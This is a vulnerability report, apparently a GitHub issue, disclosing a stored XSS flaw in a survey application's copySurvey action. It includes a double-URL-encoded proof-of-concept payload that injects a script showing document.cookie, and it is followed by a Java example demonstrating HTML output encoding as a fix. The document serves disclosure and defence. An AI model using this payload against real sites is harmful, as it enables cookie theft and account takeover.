
[security vulnerability] Stored XSS when copying the survey

Open cctv0x01 opened this issue 5 years ago • 0 comments

There is a stored XSS vulnerability which allows remote attackers to inject arbitrary web script or steal the admin's or other users' cookies when copying the survey.

Vulnerable file: /design/my-survey-design!copySurvey.action

PoC: /design/my-survey-design!copySurvey.action?surveyName=A%2520test%25EF%25BC%258Dcopy%2522%252F%253E%253Cscript%253Ealert%28document.cookie%29%253C%252Fscript%253E

Image 2

Image 1

cctv0x01, Aug 07 '19 04:08
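An added example, not DWSurvey's code and not part of the original report: it percent-decodes the `surveyName` value from the PoC until it stops changing, then shows how HTML output encoding keeps the copied name as inert text. The class and method names and the `<input value="...">` template are assumptions, since the report does not show where the name is rendered.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;

public class SurveyNameOutputEncoding {

    // Percent-decode repeatedly (bounded) so multiply-encoded input is seen in its final form.
    static String decodeUntilStable(String value) {
        String current = value;
        for (int round = 0; round < 5; round++) {
            String next = URLDecoder.decode(current, StandardCharsets.UTF_8);
            if (next.equals(current)) {
                break;
            }
            current = next;
        }
        return current;
    }

    // Encode the characters that are significant in HTML text and quoted attribute values.
    static String encodeForHtml(String value) {
        StringBuilder out = new StringBuilder(value.length() + 16);
        for (int i = 0; i < value.length(); i++) {
            char c = value.charAt(i);
            switch (c) {
                case '&': out.append("&amp;"); break;
                case '<': out.append("&lt;"); break;
                case '>': out.append("&gt;"); break;
                case '"': out.append("&quot;"); break;
                case '\'': out.append("&#39;"); break;
                default: out.append(c);
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        // surveyName value copied from the PoC in the report.
        String poc = "A%2520test%25EF%25BC%258Dcopy%2522%252F%253E%253Cscript%253E"
                   + "alert%28document.cookie%29%253C%252Fscript%253E";
        String stored = decodeUntilStable(poc);
        // Assumed template: the name is written into a quoted value attribute.
        System.out.println("unencoded: <input value=\"" + stored + "\"/>");
        System.out.println("encoded:   <input value=\"" + encodeForHtml(stored) + "\"/>");
    }
}
```

In the encoded line the quote and angle brackets from the name appear as `&quot;`, `&lt;` and `&gt;`, so the attribute is never closed and no `<script>` element is created.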